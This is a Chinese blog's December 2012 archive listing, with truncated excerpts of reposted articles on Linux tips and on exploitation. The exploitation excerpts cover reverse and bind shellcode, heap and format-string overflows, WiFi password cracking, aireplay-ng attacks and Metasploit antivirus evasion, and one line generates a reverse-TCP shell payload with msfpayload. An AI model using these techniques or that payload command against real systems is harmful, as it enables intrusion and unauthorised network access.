2012年12月_dgitra7963

转载反弹连接的shellcode

C代码#include<sys/socket.h> //构造socket所需的库#include<netinet/in.h> //定义sockaddr结构int main(){ char *shell[2]; //用于execv调用 int soc,remote; //文件描述符句柄 struct so...

2012-12-26 15:47:00 578

转载编写绑定端口的shellcode

示例C代码#include<sys/socket.h> //构造socket所需的库#include<netinet/in.h> //定义sockaddr结构int main(){ char *shell[2]; //用于execv调用 int server,client; //文件描述符句柄 stru...

2012-12-26 13:09:00 109

转载堆溢出攻击实验——unlink()攻击

实验平台：Fedora Core 1（glibc-2.3.2-101）实验前提：去掉该平台的堆执行保护：sysctl -w kernel.exec-shield=0目标漏洞代码：#//heap2.c#include<stdlib.h>#include<string.h>int main(int argc,char *argv[]){...

2012-12-26 10:38:00 482

转载 Fedora Core 4下的一些小问题

转自：http://zjmaslow.blog.163.com/blog/static/203163062200762052725807/查看文件夹总是打开新窗口:编辑->首选项->行为->选中总是在浏览器窗口中打开这样就不会每次都打开个新窗口了SSH远程登录中文乱码:File->Properties->Terminal->Translation...

2012-12-24 12:35:00 189

转载一种小堆(heap)溢出的另类利用方法

转自：http://tech.ccidnet.com/art/1101/20050422/626639_1.html一种小堆(heap)溢出的另类利用方法bkbll(bkbll@cnhonker.net)2003-9-1[1]. 什么是堆溢出堆溢出(heap overflow) 类似stack overflow, 发生在BSS区. 关于heap overflow的文章外面有很...

2012-12-22 22:17:00 84

转载一种新的Heap区溢出技术分析

转自：http://blog.donews.com/zwell/archive/2004/08/04/59092.aspx ★ 前言通常的Heap区溢出只能利用覆盖某些函数指针,jumpbuf或者重要变量等方式来完成攻击。这方面内容请参看我原来翻译整理的<HEAP/BSS 溢出机理分析>：http://magazine.nsfocus.com/det...

2012-12-22 22:02:00 145

转载格式串攻击

漏洞目标代码：//fmtstr.c#include<stdlib.h>int main(int argc,char *argv[]){ static int canary=0; char temp[2048]; strcpy(temp,argv[1]); printf(temp); printf("\n"); printf(...

2012-12-21 10:57:00 101

转载远程缓冲器溢出攻击

实验平台：Fedora Core 4 （做实验的必备利器平台，很好很强大，也可以用来学习鸟哥的linux私房菜，现在网上都不好找了）http://archives.fedoraproject.org/pub/archive/fedora/linux/core/4/i386/iso/ 这是官方的，相当给力，在网上还没有消失前提：去掉操作系统的堆栈执行保护和内存随机化机制sys...

2012-12-20 12:08:00 305

转载攻击小的缓冲区

当缓冲区比较小，不足以放下shellcode时，可以利用环境变量，因为这部分内存是可写的，理论基础是：所有的Linux ELF可执行文件映射到内存时，会将最后一个相对地址映射为0xbfffffff。而环境和参数存储在该区域中，且该区域之下刚好是栈。下面是进程上部内存详细布局。攻击目标代码：//samllbuff.cint main(int argc,char *arg...

2012-12-17 18:04:00 63

转载 Ubuntu 地址栏问题

转自：http://blog.csdn.net/wngmngchng/article/details/5693093装了Ubuntu10.04 ,用起来不错。只是文件夹的地址栏只能点击，不能输入，用起来有点不太爽。方法1：使用快捷键：ctrl-L方法2：ALT+F2打开 “运行应用程序”输入gconf-editor切换到/apps /nautilu...

2012-12-15 16:13:00 146

转载缓冲区溢出攻击实验

转自：http://blog.163.com/jw_chen_cs/blog/static/20221214820124119642246/【实验要求】 1）基本要求：编写一个能实现缓冲区溢出（整数溢出或堆栈溢出）的程序。语言不限（c，c++，c#，java等均可），环境也不限（linux或windows等）。并在调试状态下（如linux的gdb或其他集成开发环境的调试...

2012-12-15 03:28:00 516

转载 VMware下Ubuntu8.04 方向键失效的解决方法

转自：http://hi.baidu.com/rqm3000/item/539361cab619f114515058a7 方向键失效，不能使用↑键调用之前使用的命令，如果只是这样的话，倒也无所谓。可以不用小键盘，解除Num Lock，8 2 4 6即对应上下左右，但是渐渐发现其他的一些按键也不对，比如Delete是截屏，不知道Ubuntu是不是本来就这样设计的，也许还有...

2012-12-15 02:43:00 182

转载 Windows下安装squid详解

linux下安装Squid代理参考：http://zhidao.zgsj.com/article/12/2011228155429.shtml一.下载squid for windows　　下载地址:http://www.acmeconsulting.it/SquidNT.html二.Windows下安装squid与配置　　1.解压squid-2.6.STABLE6-NT-bi...

2012-12-14 14:18:00 549

转载 linux缓冲区溢出学习

漏洞代码：//meet.c#include<stdio.h>greeting(char *temp1,char *temp2){ char name[400]; strcpy(name,temp2); printf("Hello %s %s\n",temp1,name);}main(int argc,char *argv[]){ ...

2012-12-12 22:38:00 108

转载 Linux软件安装常用方法

1、软件安装卸载，分几种情况：A：RPM包，这种软件包就像windows的EXE安装文件一样，各种文件已经编译好，并打了包，哪个文件该放到哪个文件夹，都指定好了，安装非常方便，在图形界面里你只需要双击就能自动安装。==如何卸载:1、打开一个SHELL终端2、因为Linux下的软件名都包括版本号，所以卸载前最好先确定这个软件的完整名称。查找RPM包软件：rpm -qa ×××*注意...

2012-12-12 21:53:00 67

转载 linux下提示bash:command not found

如果新装的系统，运行一些很正常的诸如：shutdown，fdisk的命令时，悍然提示：bash:command not found。那么首先就要考虑root 的$PATH里是否已经包含了这些环境变量。主要是这四个：/bin ,/usr/bin,/sbin,/usr/sbin。四个主要存放的东东：./bin:bin为binary的简写主要放置一些系统的必备执行档例如:c...

2012-12-12 21:43:00 135

转载 VMware_RedHat9_Linux_网卡无法激活排障

先查看自己的系统版本！[root@localhost root]# uname -aLinux localhost 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux在2.4版本以后linux可以支持的网卡芯片已经非常的全面了,除了一些杂牌的外基本上主流与二流都给支持了.大家可以用以下命令看到系统支持的网...

2012-12-12 21:41:00 101

转载【经验】短接 Flash 解决二次量产金士顿 DTI G2 4GB U盘（群联PS2251-39）问题

转自：http://bbs.mydigit.cn/read.php?tid=270847&displayMode=1&page=1&toread=1近几天量产一个金士顿 DataTraveler G2 4GB U盘（群联 PS2251-39 主控芯片），不小心量产成一个 USB-CDROM和一个本地磁盘（均可用），然后想重新量产时发现量产工具　MPALL 3....

2012-12-12 05:22:00 832

转载 linux 推荐分区方案

转自：http://blog.163.com/machangzheng@126/blog/static/456825312009814533782/160G 硬盘/ 15Gswap 2G/boot 128M/var 20G/usr 20G/home 90G*linux native是存放系统文件的地方，它只能用ext2的分区类型，上面已说过。对windows用户...

2012-12-12 02:10:00 133

转载光棍节程序员闯关秀

转自：http://www.singlex.net/2319.html昨天的节，今天才看见有个网站弄了个“光棍节程序员闯关秀“，虽然游戏采用的策略个人感觉很老套，但还是做了一下，考验思维的时候到啦！！网址：http://segmentfault.com/game/下面是我做的思路答案，不过，你可以先尝试挑战一下自己哦~以下将贴网页代码解答第1关：页面里有个隐藏链接...

2012-12-11 02:42:00 478

转载 Burp Suite应用分享之Web漏洞扫描

转自：http://www.chowngroup.com/html/2012/hackerSkills_0718/357.html 随着Web2.0时代的来临,后又推向Web3.0,Web安全开始备受瞩目,对于白帽来说,测试时使用的工具越方便、全面、迅速越好。下面推荐一个工具Burp Suite，其功能包括HTTP包的截获及修改，扫描，网站爬行，爆破，注入检测等功能。下面就讲解一下B...

2012-12-08 23:12:00 163

转载 Blueman - Ubuntu的蓝牙管理器

转自：http://www.linuxidc.comBlueman是一个GTK+的蓝牙管理器。Blueman能够简单、高效管理BlueZ API并能简化如下一些蓝牙管理任务：1.拨号连接3G/EDGE/GPRSp 2.连接/创建蓝牙网络 3.连接输入设备 4.连接音频设备 5.通过OBEX（Object Exchange）发送、接收、浏览文件 6.配对 Blueman还把自己...

2012-12-06 16:13:00 2098

转载 ubuntu怎样添加源（转）

Ubuntu和Debian一样使用Apt高级包管理系统，可以很方便的进行在线安装、升级、卸载。但是Ubuntu和Debian所使用的源(source)是不同的。Ubuntu安装完后，默认使用的可能是国外的源，速度可能比较慢。现在国内也有很多服务器提供国外源的镜像，可以使得Ubuntu软件包的安装、升级快很多。源可以在ubuntu的菜单：系统管理=>软件源配置中图形化的配置。...

2012-12-06 16:09:00 108

转载教你用笔记本破解无线路由器密码

最近很多人问我怎么破解WiFi密码…看来大家都对免费的东西比较有兴趣。要么也可能是我太招摇了…囧…好吧，我就写篇小小的教程，看完后，你应该能够破解大部分无线路由器密码了，写这个教程也是为了加强大家对无线网络安全性的重视，后面也有简单的防破解的办法。好了，正式开始。首先，你需要的工具：软件：① BackTrack 3（简称BT3）BT3有光盘版，硬盘版还有U盘版，由...

2012-12-04 17:26:00 385

转载 could not load host key: /etc/ssh/ssh_host_rsa_key SSH无法连接

启动SSH服务时提示could not load host key: /etc/ssh/ssh_host_rsa_key但是用/etc/init.d/sshd status看状态又是启动了的，远程telnet也可以通端口但就是SSH连接不上，查资料后处理完成，只需要在服务器上依次执行两条命令即可：ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa...

2012-12-04 04:17:00 203

转载 Aireplay-ng 的 6 种攻击模式详解

原文地址：http://hi.baidu.com/odank/blog/item/f4301c8027051acc9123d9c3.htmlAireplay-ng 的 6 种攻击模式详解-0 Deautenticate 冲突模式使已经连接的合法客户端强制断开与路由端的连接，使其重新连接。在重新连接过程中获得验证数据包，从而产生有效 ARP request。如果一个客户...

2012-12-03 15:29:00 450

转载无线中间人攻击初探

转自：http://exp.iustudio.cc/?p=330×01 前言在讨论无线中间人攻击之前我们应该先看看有线网络环境下的中间人攻击的原理，了解其攻击的流程，这样对理解无线环境下的中间人攻击有很大的帮助作用，因为其手法都及其相似，只是对于无线环境下来说更加容易利用且更灵活。0×02 有线环境下的中间人攻击简介示意图：（此图片来自网上）主要使用工具...

2012-12-03 13:29:00 338

转载 Metasploit——木马免杀篇

1.生成简单到木马后门root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp O //查看这个payload有什么选项root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp LHOST=192.16...

2012-12-01 14:17:00 283